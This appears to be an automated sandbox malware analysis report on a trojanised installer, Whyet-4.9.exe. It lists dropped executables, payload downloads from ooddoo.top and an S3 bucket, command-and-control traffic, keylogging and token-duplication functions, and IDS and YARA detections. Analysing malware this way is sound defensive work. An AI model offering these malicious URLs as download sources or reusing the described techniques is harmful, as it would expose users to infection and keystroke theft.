Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Directory created: C:\Program Files\product1\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Directory created: C:\Program Files\product1\letsvpn-latest.exe			Jump to behavior

Source: unknown

HTTPS traffic detected: 104.21.81.224:443 -> 192.168.2.5:49713 version: TLS 1.2

Source: Whyet-4.9.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: \ConsoleApplication1\Release\ConsoleApplication1.pdb source: LxN_oT.exe, 00000011.00000003.2397585795.0000000000DE0000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000020.00000002.4542911854.000000000058E000.00000002.00000001.01000000.0000000F.sdmp, iusb3mon.exe, 00000020.00000003.2449036410.0000000000560000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \ConsoleApplication1\Release\ConsoleApplication1.pdb% source: LxN_oT.exe, 00000011.00000003.2397585795.0000000000DE0000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4542911854.000000000058E000.00000002.00000001.01000000.0000000F.sdmp, iusb3mon.exe, 00000020.00000003.2449036410.0000000000560000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 32_2_04D72E2C __EH_prolog,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,

32_2_04D72E2C

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2022482 - Severity 1 - ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 : 192.168.2.5:49736 -> 104.21.81.224:80
Source: Network traffic	Suricata IDS: 2022482 - Severity 1 - ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 : 192.168.2.5:49713 -> 104.21.81.224:443
Source: Network traffic	Suricata IDS: 2021954 - Severity 1 - ET MALWARE JS/Nemucod.M.gen downloading EXE payload : 104.21.81.224:443 -> 192.168.2.5:49713
Source: Network traffic	Suricata IDS: 2022482 - Severity 1 - ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 : 192.168.2.5:49737 -> 104.21.81.224:443
Source: Network traffic	Suricata IDS: 2021954 - Severity 1 - ET MALWARE JS/Nemucod.M.gen downloading EXE payload : 104.21.81.224:443 -> 192.168.2.5:49737

Source: global traffic

TCP traffic: 192.168.2.5:49757 -> 118.107.45.13:25445

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 32_2_04D767CC shellex,SetThreadExecutionState,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,WinExec,WinExec,WinExec,WinExec,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,WSAStartup,socket,GetCurrentThreadId,htons,inet_addr,connect,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,GetModuleFileNameA,GetModuleFileNameA,CopyFileA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,Sleep,ExitProcess,StartServiceCtrlDispatcherA,Sleep,GetModuleFileNameA,CopyFileA,Sleep,

32_2_04D767CC

Source: global traffic	HTTP traffic detected: GET /abc/40.exe HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Setup Factory 9.0Host: ooddoo.topConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /abc/40.exe HTTP/1.1Accept: /User-Agent: Setup Factory 9.0Connection: Keep-AliveCache-Control: no-cacheHost: ooddoo.top
Source: global traffic	HTTP traffic detected: GET /abc/40.exe HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Setup Factory 9.0Host: ooddoo.topConnection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: ooddoo.top
Source: global traffic	DNS traffic detected: DNS query: huazai168.com

Source: irsetup.exe, 00000002.00000003.2065312855.000000000616E000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4546923156.0000000004C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/ip.txt
Source: irsetup.exe, 00000002.00000003.2065312855.000000000616E000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4546923156.0000000004C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/ip.txtMozilla/4.0
Source: irsetup.exe, 00000002.00000002.4541145532.00000000012EA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: irsetup.exe, 00000002.00000003.2393803360.00000000063D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: irsetup.exe, 00000002.00000002.4541145532.00000000012EA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: irsetup.exe, 00000002.00000002.4541145532.00000000012EA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: powershell.exe, 00000012.00000002.2437259643.000000000064A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2557742454.0000000007BC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 0000000C.00000002.2193330728.0000020BBCC75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: irsetup.exe, 00000002.00000002.4541145532.00000000012EA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: irsetup.exe, 00000002.00000002.4541145532.00000000012EA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: svchost.exe, 00000021.00000002.4100661599.000002BE36400000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: irsetup.exe, 00000002.00000002.4541145532.00000000012EA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: irsetup.exe, 00000002.00000003.2393803360.00000000063D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: irsetup.exe, 00000002.00000002.4541145532.00000000012EA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: irsetup.exe, 00000002.00000002.4541145532.00000000012EA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: irsetup.exe, 00000002.00000003.2393803360.00000000063D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: irsetup.exe, 00000002.00000002.4541145532.00000000012EA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: irsetup.exe, 00000002.00000002.4541145532.00000000012EA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: svchost.exe, 00000021.00000003.2440278244.000002BE361E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 0000000C.00000002.2193060006.0000020BBCBB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.microsoft.c
Source: powershell.exe, 0000000C.00000002.2193060006.0000020BBCBB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.microsoft.ctain
Source: irsetup.exe, 00000002.00000003.2086852126.0000000006160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 0000000C.00000002.2219260408.0000020BCE77C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2193866878.0000020BC00CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2219260408.0000020BCE8B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2520449271.0000000005868000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2507699467.000000000603F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2512297555.0000000005CE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2531110628.00000000062A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: Whyet-4.9.exe, 00000000.00000002.2192685995.00000000029A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: irsetup.exe, 00000002.00000003.2393803360.00000000063D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: irsetup.exe, 00000002.00000002.4541145532.00000000012EA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: irsetup.exe, 00000002.00000002.4541145532.00000000012EA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: irsetup.exe, 00000002.00000002.4541145532.00000000012EA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: irsetup.exe, 00000002.00000002.4541145532.00000000012EA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: irsetup.exe, 00000002.00000002.4545525629.0000000004500000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000003.2061142935.0000000006162000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4544865365.00000000032D0000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4544865365.0000000003331000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4545525629.0000000004572000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ooddoo.top/abc/
Source: irsetup.exe, 00000002.00000002.4545525629.0000000004500000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4544865365.00000000032D0000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4545979900.00000000063CA000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000003.2393803360.00000000063D8000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4545979900.00000000063A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ooddoo.top/abc/40.exe
Source: powershell.exe, 00000018.00000002.2447234103.0000000005396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2554221702.0000000007B40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2586009006.000000000057A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2803843723.000000000796E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000C.00000002.2193866878.0000020BBE701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2451042089.0000000004801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2442792627.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2449266054.0000000004C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2447234103.0000000005241000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2611888707.0000000004401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Whyet-4.9.exe, 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.360.cn.
Source: powershell.exe, 0000000C.00000002.2193866878.0000020BBFBB7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000018.00000002.2447234103.0000000005396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2554221702.0000000007B40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2586009006.000000000057A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2803843723.000000000796E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: irsetup.exe, 00000002.00000003.2393803360.00000000063D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: Whyet-4.9.exe, 00000000.00000002.2192685995.00000000029A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.indigorose.com
Source: Whyet-4.9.exe, 00000000.00000003.2054506802.0000000002AAE000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4547332364.00007FF78401A000.00000002.00000001.01000000.00000005.sdmp, irsetup.exe, 00000002.00000000.2059096006.00007FF78401A000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: http://www.indigorose.com/route.php?pid=suf9buy
Source: Whyet-4.9.exe, 00000000.00000003.2054506802.0000000002AAE000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4547332364.00007FF78401A000.00000002.00000001.01000000.00000005.sdmp, irsetup.exe, 00000002.00000000.2059096006.00007FF78401A000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: http://www.indigorose.com/route.php?pid=suf9buyd
Source: powershell.exe, 00000012.00000002.2548483798.0000000006E08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: irsetup.exe, 00000002.00000002.4545525629.0000000004500000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000003.2061142935.0000000006162000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.yourcompany.com
Source: powershell.exe, 0000000C.00000002.2193866878.0000020BBE701000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000012.00000002.2451042089.0000000004801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2442792627.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2449266054.0000000004C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2447234103.0000000005241000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2611888707.0000000004401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000018.00000002.2531110628.00000000062A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000018.00000002.2531110628.00000000062A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000018.00000002.2531110628.00000000062A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000021.00000003.2440278244.000002BE36253000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000021.00000003.2440278244.000002BE361E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000018.00000002.2447234103.0000000005396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2554221702.0000000007B40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2586009006.000000000057A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2803843723.000000000796E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000C.00000002.2219260408.0000020BCE77C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2193866878.0000020BC00CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2219260408.0000020BCE8B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2520449271.0000000005868000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2507699467.000000000603F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2512297555.0000000005CE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2531110628.00000000062A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000C.00000002.2193866878.0000020BBFBB7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 0000000C.00000002.2193866878.0000020BBFBB7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: irsetup.exe, 00000002.00000002.4542558430.0000000001626000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ooddoo.top/
Source: irsetup.exe, 00000002.00000002.4545525629.0000000004500000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000003.2061142935.0000000006162000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4544865365.00000000032D0000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4544865365.0000000003331000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4545525629.0000000004572000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ooddoo.top/abc/
Source: irsetup.exe, 00000002.00000002.4545979900.00000000063A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ooddoo.top/abc/40.exe
Source: irsetup.exe, 00000002.00000002.4545525629.0000000004567000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ooddoo.top/abc/40.exe=
Source: irsetup.exe, 00000002.00000002.4545979900.00000000063CA000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000003.2393803360.00000000063D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ooddoo.top/abc/40.exec/40.exe
Source: irsetup.exe, 00000002.00000002.4545979900.00000000063A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ooddoo.top/abc/40.exev
Source: irsetup.exe, 00000002.00000002.4541145532.00000000012EA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: irsetup.exe, 00000002.00000002.4545525629.0000000004500000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000003.2061142935.0000000006162000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4544865365.0000000003331000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4545525629.0000000004572000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xiaoma.s3.ap-east-1.amazonaws.com/iusb3mon.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown

HTTPS traffic detected: 104.21.81.224:443 -> 192.168.2.5:49713 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture and log keystrokes

Source: C:\ProgramData\Program\iusb3mon.exe	Code function: <BackSpace>		32_2_04D72BF0
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: <Enter>		32_2_04D72BF0

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 32_2_04D72BF0 CreateMutexA,WaitForSingleObject,Sleep,lstrlenA,GetKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,lstrlenA,lstrcatA,lstrcatA,

32_2_04D72BF0

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 32_2_04D8ABEF GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,

32_2_04D8ABEF

Source: powershell.exe	Process created: 76
Source: conhost.exe	Process created: 64
Source: cmd.exe	Process created: 46

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 4956, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

PE file contains section with special chars

Source: LxN_oT.exe.2.dr	Static PE information: section name:
Source: LxN_oT.exe.2.dr	Static PE information: section name:
Source: LxN_oT.exe.2.dr	Static PE information: section name:
Source: LxN_oT.exe.2.dr	Static PE information: section name:
Source: LxN_oT.exe.2.dr	Static PE information: section name:
Source: iusb3mon.exe.17.dr	Static PE information: section name:
Source: iusb3mon.exe.17.dr	Static PE information: section name:
Source: iusb3mon.exe.17.dr	Static PE information: section name:
Source: iusb3mon.exe.17.dr	Static PE information: section name:
Source: iusb3mon.exe.17.dr	Static PE information: section name:

Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe

Process Stats: CPU usage > 49%

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 32_2_04D75792 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetCurrentProcess,OpenProcessToken,DuplicateTokenEx,LoadLibraryA,GetProcAddress,SetTokenInformation,CreateProcessAsUserA,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,

32_2_04D75792

Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 32_2_04D739EC ExitWindowsEx,		32_2_04D739EC
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 32_2_04D7628E WinExec,WinExec,WinExec,WinExec,Sleep,ExitWindowsEx,		32_2_04D7628E

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\Whyet-4.9.exe	Code function: 0_2_00007FF676FA1C88	0_2_00007FF676FA1C88
Source: C:\Users\user\Desktop\Whyet-4.9.exe	Code function: 0_2_00007FF676FA3D40	0_2_00007FF676FA3D40
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180026800	2_2_0000000180026800
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180030014	2_2_0000000180030014
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180027854	2_2_0000000180027854
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018003C0A0	2_2_000000018003C0A0
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800218A4	2_2_00000001800218A4
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800228CC	2_2_00000001800228CC
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800308FC	2_2_00000001800308FC
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800310FC	2_2_00000001800310FC
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180033914	2_2_0000000180033914
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018002B938	2_2_000000018002B938
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018002F154	2_2_000000018002F154
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180033220	2_2_0000000180033220
